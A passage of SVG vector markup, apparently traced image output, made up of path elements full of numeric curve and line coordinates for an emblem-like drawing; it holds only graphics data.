-15 112 -9 0 -15 -10 -15 -26 0 -20 -4 -25 -16 -20 -9 3 -18 6 -20 6 -3 0 -3 3 0 8 2 4 -13 6 -35 4 -36 -4 -39 -7 -39 -33 0 -16 -4 -29 -9 -29 -5 0 -6 20 -3 45 4 37 2 45 -12 45 -14 0 -16 -15 -16 -112z m118 -2 c-3 -58 -4 -61 -29 -61 -15 -1 -34 -7 -43 -14 -14 -12 -16 -10 -15 15 0 25 2 26 9 9 7 -18 9 -18 15 -3 4 10 5 41 3 70 l-3 53 33 -3 33 -4 -3 -62z m32 -44 c0 -19 -5 -29 -15 -29 -11 0 -12 4 -5 11 5 5 10 18 10 28 0 10 2 18 5 18 3 0 5 -13 5 -28z\"/>\r\n <path d=\"M919 2900 c-1 -55 -2 -105 -3 -111 -1 -8 28 -12 87 -13 l87 -1 0 113 c0 92 -3 112 -15 112 -9 0 -12 -6 -8 -17 4 -11 3 -14 -5 -9 -8 5 -8 -1 0 -24 5 -17 8 -34 4 -37 -3 -4 -6 0 -6 9 0 22 -33 48 -62 48 -38 0 -52 -36 -44 -109 5 -42 4 -61 -4 -61 -7 0 -11 28 -10 83 2 112 1 117 -10 117 -6 0 -11 -41 -11 -100z m111 -14 l0 -65 -29 1 c-30 1 -30 1 -30 65 l0 63 30 0 29 0 0 -64z m34 -69 c-3 -9 -11 -14 -16 -11 -6 4 -5 10 3 15 11 7 11 9 1 9 -7 0 -10 5 -6 11 10 16 26 -5 18 -24z\"/>\r\n <path d=\"M1211 2894 l3 -107 -50 -24 c-146 -72 -347 -121 -530 -130 l-122 -6 -6 -45 c-18 -134 -2 -496 30 -687 19 -108 84 -310 119 -365 30 -48 31 -57 5 -65 -11 -3 -20 -13 -20 -21 0 -8 -4 -13 -9 -10 -14 9 -7 34 15 51 16 12 17 14 2 15 -9 0 -23 3 -32 6 -14 5 -16 -8 -16 -110 l0 -116 91 0 c90 0 91 0 85 23 -3 12 -6 25 -6 30 0 15 -20 7 -20 -9 0 -8 -4 -13 -9 -9 -5 3 -12 1 -16 -5 -3 -5 -12 -10 -18 -10 -7 0 -4 5 6 11 11 7 17 22 17 49 0 22 3 40 8 40 4 0 18 -17 32 -37 32 -46 101 -117 165 -168 27 -22 59 -48 69 -57 11 -10 28 -20 38 -24 18 -5 19 -15 16 -115 l-3 -109 33 0 32 0 0 54 c0 69 -10 117 -22 110 -10 -6 -28 12 -28 28 0 9 39 -8 107 -47 l53 -30 0 -57 0 -58 91 0 c68 0 90 3 86 13 -2 6 -13 11 -24 9 -11 -1 -26 4 -33 13 -7 8 -25 15 -41 15 -21 0 -29 5 -30 18 0 9 -3 12 -5 5 -3 -7 0 -21 6 -32 8 -17 8 -19 -4 -15 -19 7 -24 22 -21 67 2 32 -2 38 -27 49 -15 7 -28 16 -28 19 0 3 -18 12 -40 19 -22 7 -45 19 -51 27 -6 7 -18 13 -25 13 -8 0 -13 5 -12 12 2 7 -2 12 -9 13 -14 0 -43 24 -61 51 -7 10 -10 13 -7 7 8 -17 -1 -16 -31 4 -19 12 -22 18 -12 25 10 7 9 8 -3 6 -9 -2 -37 16 -62 40 -26 23 -44 42 -42 42 3 0 -3 9 -12 20 -10 11 -23 20 -31 20 -7 0 -10 5 -6 12 4 7 3 8 -4 4 -7 -4 -12 -1 -12 8 0 9 -4 16 -8 16 -4 0 -16 14 -26 30 -9 17 -27 40 -39 52 -21 20 -21 21 -2 14 17 -5 18 -4 4 6 -19 15 -79 139 -79 162 0 9 -4 24 -9 34 -18 35 -30 68 -40 107 -14 53 -14 68 2 59 6 -4 4 1 -5 12 -9 11 -17 28 -17 39 0 11 -5 54 -11 95 -20 135 -23 183 -23 383 0 183 1 198 19 211 12 9 24 11 35 5 9 -4 18 -6 21 -4 3 3 34 7 69 9 82 6 187 24 212 37 10 6 28 9 38 6 13 -3 17 -1 12 6 -4 8 -1 7 9 -1 13 -10 17 -10 22 3 3 8 17 15 31 15 14 0 25 4 25 8 0 5 6 9 13 9 28 1 97 24 97 33 0 6 3 9 8 9 4 -1 10 0 15 1 10 3 25 7 35 9 4 0 19 12 34 26 15 14 42 28 60 32 18 3 44 17 58 30 13 13 29 23 34 23 5 0 16 7 25 15 9 8 29 27 46 42 16 16 35 27 43 25 9 -2 11 1 7 8 -11 18 34 2 58 -21 12 -10 29 -21 39 -25 10 -3 18 -11 18 -19 0 -7 9 -15 21 -18 13 -4 18 -10 13 -18 -4 -8 -3 -10 4 -5 7 4 12 3 12 -3 0 -6 6 -8 13 -6 17 7 80 -33 72 -45 -6 -10 7 -14 31 -11 6 1 17 -6 24 -14 7 -8 18 -15 26 -15 23 0 64 -23 58 -32 -3 -5 0 -8 7 -7 21 3 79 -13 79 -21 0 -5 10 -6 22 -2 15 4 19 2 13 -7 -5 -10 -2 -11 14 -6 12 4 21 2 21 -4 0 -6 7 -8 15 -5 8 4 22 1 30 -6 9 -7 18 -10 21 -7 3 3 20 1 37 -4 27 -8 129 -16 267 -22 33 -2 35 -4 39 -42 10 -88 4 -486 -8 -585 -7 -58 -13 -115 -13 -127 0 -13 -3 -21 -8 -18 -4 2 -5 -7 -2 -20 2 -15 0 -25 -7 -25 -7 0 -10 -4 -6 -10 6 -9 -39 -178 -51 -189 -4 -3 -3 5 0 19 6 21 5 22 -4 7 -6 -9 -8 -22 -5 -27 6 -11 -41 -117 -62 -138 -7 -7 -13 -18 -13 -23 0 -6 -4 -7 -10 -4 -6 4 -10 -5 -10 -20 0 -17 -7 -29 -22 -35 -13 -5 -19 -9 -14 -9 9 -1 -88 -101 -98 -101 -3 0 -28 -22 -55 -50 -27 -27 -56 -50 -64 -50 -8 0 -22 -11 -31 -25 -9 -14 -24 -25 -34 -25 -14 0 -14 -2 -3 -9 10 -6 27 -1 55 17 52 33 161 127 201 171 16 19 40 46 53 59 l22 25 -1 -39 c0 -21 -3 -34 -5 -27 -8 18 -34 4 -34 -18 0 -17 8 -19 88 -19 l87 0 -3 113 c-3 114 -3 114 -27 109 -15 -2 -22 -9 -18 -18 3 -8 9 -11 14 -8 5 3 9 -5 9 -17 0 -21 -1 -21 -20 -4 -19 17 -19 16 -17 -54 l2 -71 -31 0 c-31 0 -32 0 -29 46 2 28 11 55 23 68 62 69 142 314 168 516 18 136 25 536 11 630 l-8 55 -109 2 c-186 4 -350 41 -528 121 l-83 37 3 94 c2 71 0 95 -10 99 -9 3 -13 -3 -12 -14 1 -11 1 -37 0 -59 l-3 -40 -6 35 c-4 20 -2 39 4 43 6 5 2 6 -9 3 -10 -4 -24 -2 -30 3 -6 5 -21 5 -33 0 -26 -10 -48 -45 -33 -54 5 -3 10 -10 10 -16 0 -5 -9 -4 -20 3 -12 8 -18 19 -14 28 3 8 7 23 9 33 2 9 7 22 10 27 3 6 -4 10 -16 10 -19 0 -21 -4 -16 -35 3 -19 3 -35 -1 -35 -3 0 -21 14 -39 32 l-33 32 -25 -24 c-54 -55 -65 -60 -65 -30 0 18 10 25 33 21 4 0 7 8 7 19 0 15 -7 20 -25 20 -23 0 -25 -3 -25 -48 0 -47 -2 -50 -47 -79 -74 -48 -125 -74 -130 -69 -11 11 7 35 22 30 13 -5 15 7 15 80 0 96 -17 118 -23 29 l-3 -58 -2 58 c-2 44 -5 57 -18 57 -13 0 -15 -15 -13 -106z m489 6 c0 -27 5 -50 10 -50 6 0 10 8 10 17 0 22 6 14 14 -20 6 -26 5 -27 -14 -17 -11 6 -20 9 -20 6 0 -3 -13 7 -29 22 -16 16 -31 41 -33 60 -4 31 -3 32 29 32 33 0 33 0 33 -50z m-990 -1459 c5 -11 10 -40 10 -65 0 -43 -2 -46 -27 -46 -14 0 -35 -7 -45 -17 -17 -15 -18 -15 -18 0 0 10 6 16 13 15 8 -2 13 17 15 65 3 58 5 67 22 67 11 0 24 -9 30 -19z m-78 -83 c-7 -7 -12 -8 -12 -2 0 14 12 26 19 19 2 -3 -1 -11 -7 -17z m1737 -49 c-16 -10 -23 -4 -14 10 3 6 11 8 17 5 6 -4 5 -9 -3 -15z m-1276 -289 c-3 -12 -8 -19 -11 -16 -5 6 5 36 12 36 2 0 2 -9 -1 -20z m-6 -52 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M1872 2889 l3 -112 28 -3 27 -3 0 115 c0 97 -2 114 -16 114 -13 0 -15 -14 -12 -95 2 -52 0 -95 -4 -95 -5 0 -8 43 -8 95 0 59 -4 95 -10 95 -7 0 -10 -40 -8 -111z\"/>\r\n <path d=\"M2040 2888 l0 -113 30 0 30 0 0 113 c0 117 -16 156 -23 55 l-3 -58 -2 58 c-2 43 -6 57 -17 57 -12 0 -15 -19 -15 -112z m43 -28 c3 -11 1 -23 -4 -26 -5 -3 -9 6 -9 20 0 31 6 34 13 6z\"/>\r\n <path d=\"M2220 2888 l0 -113 85 2 c47 1 85 5 85 8 0 3 0 52 0 110 0 63 -4 105 -10 105 -5 0 -11 -17 -11 -37 l-2 -38 -7 40 c-5 30 -8 33 -9 13 0 -15 -6 -30 -12 -33 -6 -4 -9 -31 -8 -62 3 -55 2 -56 -27 -59 l-29 -3 2 62 c1 62 1 62 32 65 38 4 31 22 -8 22 -45 0 -55 -21 -48 -98 5 -51 4 -63 -5 -48 -7 12 -9 48 -5 98 5 65 4 78 -8 78 -12 0 -15 -20 -15 -112z m147 -70 c-2 -13 -4 -3 -4 22 0 25 2 35 4 23 2 -13 2 -33 0 -45z\"/>\r\n <path d=\"M2510 2895 c0 -58 0 -108 0 -112 0 -4 12 -7 28 -7 27 0 27 0 25 65 -1 35 -2 85 -2 112 -1 46 -15 64 -24 30 -4 -17 -5 -17 -6 0 0 9 -5 17 -11 17 -6 0 -10 -42 -10 -105z m27 -67 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z\"/>\r\n <path d=\"M2690 2901 c0 -55 -2 -105 -5 -113 -4 -10 14 -13 85 -13 l90 0 0 113 c0 68 -4 112 -10 112 -9 0 -11 -9 -15 -62 -1 -26 -15 -34 -15 -10 0 29 -45 59 -64 43 -16 -14 -46 -4 -46 15 0 8 -4 14 -10 14 -6 0 -10 -40 -10 -99z m112 -16 c-4 -64 -4 -65 -30 -62 -26 3 -27 7 -30 65 l-2 62 32 0 33 0 -3 -65z m-85 3 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m119 -57 c-4 -6 -13 -11 -19 -10 -9 0 -9 2 0 5 7 3 9 13 6 22 -5 13 -3 14 7 5 7 -6 9 -16 6 -22z m-112 4 c3 -8 1 -15 -4 -15 -6 0 -10 7 -10 15 0 8 2 15 4 15 2 0 6 -7 10 -15z m99 -32 c-7 -2 -19 -2 -25 0 -7 3 -2 5 12 5 14 0 19 -2 13 -5z\"/>\r\n <path d=\"M1490 2762 c-8 -3 -19 -11 -23 -19 -5 -7 -14 -10 -20 -7 -7 4 -9 4 -5 -1 11 -12 -40 -48 -58 -41 -10 4 -14 1 -11 -6 5 -16 -89 -70 -121 -70 -12 0 -25 -5 -29 -11 -4 -6 -1 -7 7 -2 8 5 11 4 6 -3 -3 -6 -20 -13 -36 -17 -16 -4 -32 -11 -35 -16 -4 -5 -22 -9 -41 -9 -19 0 -33 -4 -30 -9 4 -5 -13 -12 -36 -16 -24 -4 -69 -13 -100 -21 -32 -8 -96 -16 -143 -17 -116 -4 -114 -1 -115 -202 0 -161 15 -346 30 -376 5 -9 6 -27 3 -39 -3 -13 -2 -21 3 -18 5 4 10 -11 12 -33 1 -21 11 -58 21 -81 10 -24 16 -49 14 -55 -3 -7 1 -13 7 -13 7 0 9 -9 5 -22 -5 -18 -4 -20 4 -8 9 13 11 13 11 0 0 -20 33 -84 53 -105 9 -8 14 -22 10 -30 -4 -11 0 -14 13 -9 11 4 16 4 13 0 -6 -6 44 -69 88 -110 52 -49 88 -81 93 -81 17 -1 52 -36 47 -48 -4 -10 1 -13 19 -9 14 2 32 -2 42 -11 9 -8 27 -18 40 -22 12 -3 20 -11 16 -16 -3 -5 -2 -8 3 -7 14 4 94 -32 89 -40 -3 -5 8 -7 25 -6 21 1 29 -2 29 -14 0 -14 2 -14 9 -3 7 11 12 10 28 -6 11 -11 31 -18 48 -17 17 1 35 -3 42 -8 8 -7 18 -5 28 6 9 9 22 16 28 16 7 0 29 9 50 20 43 23 51 25 41 8 -4 -7 2 -4 13 8 11 11 41 28 67 38 27 10 43 22 40 28 -4 6 -2 8 3 5 12 -7 139 74 160 101 7 9 13 14 13 10 0 -11 81 75 125 132 22 29 48 61 57 71 9 9 14 20 11 23 -3 2 5 15 16 27 12 13 19 29 17 35 -2 6 2 21 9 31 8 11 22 48 31 81 9 34 21 59 26 56 4 -3 8 -1 8 5 0 5 -4 12 -8 15 -4 3 -6 21 -4 42 3 21 8 31 12 24 18 -30 28 199 20 493 -2 82 -5 100 -21 111 -10 7 -17 15 -14 18 7 7 -27 7 -45 0 -25 -9 -50 -10 -50 0 0 5 -21 8 -47 7 -27 -1 -61 1 -78 4 -92 14 -114 20 -108 30 3 5 1 7 -5 3 -6 -3 -23 -1 -39 6 -15 6 -31 12 -35 13 -5 2 -10 4 -13 5 -7 3 -22 7 -36 9 -5 0 -8 5 -5 10 3 5 -1 12 -10 15 -8 3 -12 2 -9 -4 10 -16 -11 -12 -25 4 -6 8 -19 12 -27 9 -11 -4 -14 -2 -9 5 6 11 2 13 -19 12 -3 -1 -12 5 -20 12 -32 29 -45 39 -45 33 0 -3 -14 7 -31 22 -45 41 -82 61 -99 55z m141 -115 c50 -32 134 -74 211 -105 73 -30 209 -54 304 -56 l102 -1 6 -73 c24 -262 -17 -595 -94 -767 -58 -129 -174 -257 -315 -350 -98 -64 -122 -76 -242 -125 l-95 -38 -68 23 c-117 40 -244 107 -345 184 -217 165 -325 375 -354 691 -19 214 -21 245 -14 341 l6 96 106 6 c151 9 294 48 433 118 77 39 188 111 213 139 l19 21 35 -34 c20 -19 61 -50 92 -70z\"/>\r\n <path d=\"M1330 2441 c-104 -26 -140 -41 -140 -57 0 -19 20 -18 89 6 91 30 227 44 316 30 77 -12 98 -9 89 14 -6 16 -3 15 -154 21 -100 3 -140 1 -200 -14z\"/>\r\n <path d=\"M1737 2413 c-9 -14 5 -27 44 -41 46 -16 59 -15 59 3 0 22 -92 55 -103 38z\"/>\r\n <path d=\"M1377 2373 c-20 -3 -27 -9 -25 -21 2 -11 11 -16 23 -13 11 2 70 3 130 4 154 1 256 -32 368 -117 48 -37 77 -46 77 -24 0 37 -159 128 -276 158 -73 19 -216 25 -297 13z\"/>\r\n <path d=\"M1200 2310 c-74 -39 -180 -122 -180 -141 0 -25 33 -19 63 11 40 41 137 105 183 120 23 8 34 17 32 28 -5 26 -20 23 -98 -18z\"/>\r\n <path d=\"M1438 2298 c-37 -3 -85 -12 -105 -19 -180 -58 -321 -211 -340 -368 -5 -47 -4 -51 14 -51 17 0 22 9 28 47 11 73 57 163 111 216 97 97 200 138 349 142 77 2 100 6 100 16 0 18 -70 26 -157 17z\"/>\r\n <path d=\"M1647 2273 c-14 -13 -6 -22 31 -33 20 -7 57 -23 81 -37 39 -23 45 -24 59 -9 14 14 9 18 -59 51 -72 35 -99 41 -112 28z\"/>\r\n <path d=\"M990 2235 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0 -10 -7 -10 -15z\"/>\r\n <path d=\"M1467 2224 c-21 -21 -3 -32 66 -36 126 -9 221 -58 292 -150 44 -58 65 -124 65 -208 0 -65 2 -70 21 -70 21 0 21 4 17 93 -3 81 -8 99 -38 155 -50 94 -142 167 -250 200 -47 14 -164 25 -173 16z\"/>\r\n <path d=\"M1322 2188 c-41 -17 -72 -36 -72 -44 0 -20 14 -18 89 12 78 31 86 37 69 52 -10 8 -32 3 -86 -20z\"/>\r\n <path d=\"M1853 2154 c-3 -10 7 -29 29 -52 19 -20 44 -56 54 -79 20 -45 33 -56 53 -43 16 10 -12 66 -69 138 -43 55 -57 62 -67 36z\"/>\r\n <path d=\"M772 2135 c0 -16 2 -22 5 -12 2 9 2 23 0 30 -3 6 -5 -1 -5 -18z\"/>\r\n <path d=\"M1410 2136 c-69 -19 -111 -44 -159 -94 -52 -54 -80 -113 -81 -164 0 -31 4 -38 20 -38 14 0 20 7 20 23 0 109 106 219 233 242 27 5 37 12 35 23 -4 21 -15 22 -68 8z\"/>\r\n <path d=\"M1543 2143 c-27 -9 -12 -32 25 -38 20 -4 47 -10 60 -16 17 -7 24 -5 29 6 3 9 3 18 0 21 -9 9 -102 31 -114 27z\"/>\r\n <path d=\"M1173 2088 c-58 -61 -86 -132 -93 -234 -4 -81 -8 -94 -29 -111 -14 -11 -21 -25 -17 -31 11 -19 31 -14 57 14 21 22 25 39 30 118 6 102 29 162 82 216 17 18 27 36 23 45 -8 22 -19 19 -53 -17z\"/>\r\n <path d=\"M1695 2070 c-3 -5 11 -26 31 -46 63 -64 76 -108 73 -242 -3 -101 -1 -117 12 -120 25 -5 29 18 26 151 -2 135 -10 158 -76 230 -35 37 -55 45 -66 27z\"/>\r\n <path d=\"M1445 2063 c-38 -8 -90 -36 -118 -62 -49 -45 -67 -92 -67 -176 0 -90 -22 -141 -81 -194 -39 -33 -52 -71 -25 -71 23 0 124 117 135 158 6 20 11 66 11 101 0 112 41 170 144 205 61 21 131 9 189 -31 59 -41 77 -86 77 -191 0 -156 -47 -280 -151 -395 -49 -54 -57 -68 -44 -73 19 -8 70 37 124 111 78 106 111 209 111 349 0 116 -16 162 -72 212 -56 50 -155 75 -233 57z\"/>\r\n <path d=\"M1424 1970 c-55 -28 -72 -65 -77 -170 -4 -102 -23 -143 -96 -215 -49 -48 -66 -85 -37 -85 19 0 122 113 147 162 15 30 23 70 28 141 6 95 8 100 36 123 23 18 42 24 83 24 46 0 58 -4 83 -29 28 -28 29 -33 29 -119 0 -158 -53 -275 -179 -396 -34 -31 -61 -62 -61 -67 0 -28 45 0 112 69 134 138 162 205 163 384 0 110 -1 118 -25 143 -52 57 -134 70 -206 35z\"/>\r\n <path d=\"M1459 1897 c-13 -10 -18 -34 -20 -102 -5 -119 -33 -176 -133 -275 -41 -40 -73 -77 -70 -82 13 -20 40 -3 110 67 96 96 124 156 133 280 5 81 8 90 26 90 18 0 20 -8 23 -64 6 -136 -30 -222 -145 -340 -45 -47 -80 -89 -77 -93 11 -18 33 -4 107 70 111 110 148 187 155 323 4 86 2 102 -13 119 -21 23 -71 26 -96 7z\"/>\r\n <path d=\"M1170 1771 c0 -22 -12 -41 -45 -73 -44 -42 -58 -78 -31 -78 18 0 94 83 106 116 16 41 12 64 -10 64 -15 0 -20 -7 -20 -29z\"/>\r\n <path d=\"M1774 1603 c-3 -10 -12 -33 -20 -52 -16 -35 -8 -56 17 -46 16 6 51 94 43 107 -9 14 -34 8 -40 -9z\"/>\r\n <path d=\"M1595 1330 c-3 -5 -1 -10 4 -10 6 0 11 5 11 10 0 6 -2 10 -4 10 -3 0 -8 -4 -11 -10z\"/>\r\n <path d=\"M124 2497 l1 -112 87 -2 88 -2 0 115 0 114 -88 0 -88 0 0 -113z m149 68 c-7 -21 -13 -19 -13 6 0 11 4 18 10 14 5 -3 7 -12 3 -20z m-101 3 c-5 -7\r\n -12 -22 -15 -33 -3 -13 -5 -9 -6 13 -1 23 3 32 15 32 12 0 14 -3 6 -12z m70 -59 c-3 -42 0 -75 6 -81 14 -14 26 30 20 72 -2 16 -1 27 4 24 9 -6 11 -75 2 -98 -3 -9 -15 -16 -26 -16 -10 0 -16 5 -13 10 4 6 -7 10 -24 10 l-31 0 0 65 0 65 30 0 c17 0 30 5 30 10 0 6 1 10 3 10 1 0 1 -32 -1 -71z m-58 -92 c7 -5 3 -7 -9 -5 -13 2 -21 12 -23 28 -2 24 -2 24 9 5 7 -11 17 -24 23 -28z\"/>\r\n <path d=\"M420 2497 l0 -114 30 -1 30 -1 0 115 0 114 -30 0 -30 0 0 -113z m31 -24 c2 -23 0 -45 -4 -49 -4 -4 -7 17 -7 46 0 62 7 64 11 3z\"/>\r\n <path d=\"M2527 2498 l2 -112 86 -3 85 -3 0 115 0 115 -87 0 -88 0 2 -112z m73 88 c0 -3 -4 -8 -10 -11 -5 -3 -10 -1 -10 4 0 6 5 11 10 11 6 0 10 -2 10 -4z m-30 -15 c0 -6 -4 -12 -8 -15 -5 -3 -9 1 -9 9 0 8 4 15 9 15 4 0 8 -4 8 -9z m108 -18 c2 -12 -1 -30 -7 -40 -8 -14 -9 -8 -4 21 4 27 3 37 -5 32 -6 -3 -14 -1 -17 5 -5 7 0 10 11 7 11 -2 20 -13 22 -25z m-38 -58 l0 -65 -30 0 -30 0 1 65 c2 65 2 65 30 65 29 0 29 0 29 -65z m35 -66 c-4 -11 -15 -19 -26 -19 -11 0 -17 5 -14 10 3 6 13 10 20 10 11 0 13 9 9 33 -4 29 -4 30 6 8 6 -13 8 -32 5 -42z m-106 -7 c1 -7 -3 -10 -9 -7 -5 3 -10 18 -9 33 0 24 1 25 9 7 5 -11 9 -26 9 -33z\"/>\r\n <path d=\"M2800 2495 l0 -115 30 0 30 0 0 115 0 115 -30 0 -30 0 0 -115z m40 -31 c0 -34 -4 -53 -10 -49 -5 3 -10 28 -10 56 0 27 5 49 10 49 6 0 10 -25 10 -56z\"/>\r\n <path d=\"M123 2140 l-1 -110 29 0 29 0 0 94 c0 52 3 101 6 110 5 13 -1 16 -27 16 l-34 0 -2 -110z\"/>\r\n <path d=\"M285 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m147 68 c-2 -10 -6 -18 -8 -18 -2 0 -8 8 -13 18 -7 14 -6 18 8 18 12 0 17 -6 13 -18z m-32 -71 l0 -64 -30 5 c-29 4 -30 5 -30 63 0 59 0 59 30 59 l30 0 0 -63z m37 -27 c4 -48 3 -59 -8 -55 -10 4 -13 21 -11 66 5 74 13 70 19 -11z m-114 -4 c2 -16 12 -35 23 -43 18 -14 18 -14 -6 -11 -27 3 -39 28 -32 66 6 28 10 25 15 -12z\"/>\r\n <path d=\"M2510 2140 l0 -110 28 0 27 0 0 110 0 110 -27 0 -28 0 0 -110z m27 -42 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z\"/>\r\n <path d=\"M2685 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m135 73 c0 -14 -2 -15 -9 -4 -6 10 -20 12 -45 8 -20 -3 -36 -2 -36 2 0 4 20 8 45 10 38 2 45 -1 45 -16z m-20 -73 c0 -60 0 -60 -30 -60 -30 0 -30 0 -30 60 0 60 0 60 30 60 30 0 30 0 30 -60z m40 44 c0 -8 -5 -12 -10 -9 -6 4 -8 11 -5 16 9 14 15 11 15 -7z m-104 -119 c13 -9 12 -11 -5 -11 -19 0 -21 6 -19 56 1 53 2 53 5 11 3 -25 11 -50 19 -56z m91 73 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m13 -43 c0 -25 -32 -50 -53 -41 -7 2 -4 5 6 5 11 1 20 12 24 31 7 36 23 40 23 5z\"/>\r\n <path d=\"M124 1750 l1 -110 88 0 87 0 0 110 0 110 -88 0 -89 0 1 -110z m37 53 c-9 -16 -10 -14 -11 12 0 21 3 26 11 18 8 -8 8 -16 0 -30z m93 21 c5 -14 4 -15 -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-14 -77 c0 -62 0 -63 -27 -61 -27 1 -28 3 -31 62 l-3 62 31 0 30 0 0 -63z m37 11 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m-13 -85 c-17 -17 -18 -17 -11 0 4 10 7 24 7 30 0 8 3 8 11 0 9 -9 7 -16 -7 -30z m-94 2 c10 -12 10 -15 -4 -15 -9 0 -16 7 -16 15 0 8 2 15 4 15 2 0 9 -7 16 -15z\"/>\r\n <path d=\"M420 1750 l0 -110 30 0 30 0 0 110 0 110 -30 0 -30 0 0 -110z\"/>\r\n <path d=\"M2525 1750 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m45 66 c0 -23 -16 -27 -17 -5 -1 10 2 19 8 19 5 0 9 -6 9 -14z m101 -3 c5 -97 5 -134 -2 -145 -5 -8 -9 17 -9 59 0 39 -3 78 -6 87 -3 9 -1 16 5 16 6 0 11 -8 12 -17z m-29 -72 c2 -52 0 -67 -9 -60 -6 6 -20 9 -30 7 -16 -3 -18 5 -21 60 l-3 62 30 0 29 0 4 -69z m-85 -23 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m20 -44 c2 -6 -3 -11 -12 -11 -8 0 -15 7 -15 15 0 15 22 12 27 -4z\"/>\r\n <path d=\"M2800 1751 c0 -108 0 -109 25 -113 13 -3 27 -3 30 0 3 3 5 54 5 114 l0 108 -30 0 -30 0 0 -109z m40 -11 c0 -33 -4 -60 -9 -60 -9 0 -14 98 -5 112 11 17 14 6 14 -52z\"/>\r\n <path d=\"M641 1634 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z\"/>\r\n <path d=\"M129 1507 c0 -1 -1 -53 -2 -115 l-2 -112 28 0 27 0 0 105 c0 58 1 108 3 111 1 4 -10 8 -25 10 -16 1 -28 2 -29 1z m28 -99 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z\"/>\r\n <path d=\"M290 1505 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111 -83 1 c-45 1 -82 2 -82 2z m142 -47 c5 -76 3 -144 -7 -150 -16 -12 -35 -9 -32 5 1 7 -10 13 -26 15 -28 3 -28 4 -25 65 3 59 4 62 31 64 l27 2 0 -70 c0 -44 4 -69 11 -69 8 0 10 26 7 80 -2 44 0 80 4 80 5 0 9 -10 10 -22z m-109 -3 c-3 -9 -8 -14 -10 -11 -3 3 -2 9 2 15 9 16 15 13 8 -4z m10 -144 c10 -11 9 -13 -3 -9 -17 5 -28 59 -20 103 4 22 6 16 8 -25 2 -30 9 -61 15 -69z\"/>\r\n <path d=\"M2510 1505 c0 0 -1 -51 -3 -113 l-2 -112 30 0 31 0 -2 112 -3 111 -25 2 c-14 0 -26 1 -26 0z m32 -102 c-5 -83 -9 -90 -11 -20 0 37 2 67 7 67 4 0 6 -21 4 -47z\"/>\r\n <path d=\"M2689 1500 c0 -3 -1 -53 -2 -112 l-2 -108 88 0 88 0 -3 111 -3 111\r\n -83 1 c-45 1 -82 0 -83 -3z m42 -43 c-6 -6 -11 -35 -11 -64 0 -29 -3 -53 -7\r\n -53 -8 0 -6 104 2 128 3 7 10 10 16 7 8 -5 8 -10 0 -18z m93 7 c5 -14 4 -15\r\n -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-21 -16 c-2 -5 -3 -33 -3 -63 0\r\n -54 0 -55 -30 -55 -30 0 -30 0 -30 58 0 32 2 61 5 63 7 8 60 5 58 -3z m37 -74\r\n c0 -41 -4 -63 -10 -59 -5 3 -10 1 -10 -4 0 -6 -7 -11 -17 -11 -15 0 -15 1 0\r\n 18 11 12 17 36 17 70 0 29 5 52 10 52 6 0 10 -29 10 -66z m-103 -70 c-9 -9\r\n -28 6 -21 18 4 6 10 6 17 -1 6 -6 8 -13 4 -17z\"/>\r\n <path d=\"M2080 1459 c0 -5 5 -7 10 -4 6 3 10 8 10 11 0 2 -4 4 -10 4 -5 0 -10\r\n -5 -10 -11z\"/>\r\n <path d=\"M129 1110 c-1 -3 -2 -53 -3 -112 l-1 -108 87 0 88 0 0 113 0 112 -85\r\n 0 c-47 0 -86 -2 -86 -5z m42 -34 c-5 -6 -11 -29 -14 -51 -4 -34 -4 -33 -4 11\r\n 0 35 4 51 14 51 8 0 9 -4 4 -11z m98 -3 c0 -11 -3 -13 -6 -5 -11 28 -23 -3\r\n -23 -64 l0 -64 -30 0 -31 0 3 63 c3 58 5 62 26 60 13 -2 25 4 28 12 8 21 34\r\n 19 33 -2z m8 -55 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z m0 -50\r\n c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-107 -41 c0 -18 -2 -19\r\n -10 -7 -13 20 -13 43 0 35 6 -3 10 -16 10 -28z m103 3 c-3 -12 -8 -19 -11 -16\r\n -5 6 5 36 12 36 2 0 2 -9 -1 -20z\"/>\r\n <path d=\"M420 1004 l0 -114 30 0 30 0 0 113 0 114 -30 1 -30 1 0 -115z\"/>\r\n <path d=\"M600 1115 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111\r\n -83 1 c-45 1 -82 2 -82 2z m42 -43 c-7 -2 -12 -16 -13 -30 0 -15 -3 -21 -6\r\n -14 -8 21 6 64 19 56 9 -6 9 -9 0 -12z m95 3 c0 -8 -4 -12 -9 -9 -4 3 -8 9 -8\r\n 15 0 5 4 9 8 9 5 0 9 -7 9 -15z m-27 -70 l0 -65 -30 0 c-30 0 -30 0 -30 58 0\r\n 65 3 72 37 72 22 0 23 -4 23 -65z m-48 -85 c23 -9 23 -9 -3 -9 -27 -1 -40 15\r\n -38 47 0 12 3 10 9 -6 5 -12 20 -27 32 -32z m88 6 c0 -17 -2 -18 -10 -6 -7 11\r\n -10 11 -10 2 0 -7 -4 -11 -10 -7 -13 8 -2 32 15 32 9 0 15 -10 15 -21z\"/>\r\n <path d=\"M884 1111 c-2 -2 -4 -53 -4 -113 l0 -108 33 0 32 0 -3 114 -3 114\r\n -25 -2 c-14 0 -28 -3 -30 -5z m23 -53 c-3 -7 -5 -2 -5 12 0 14 2 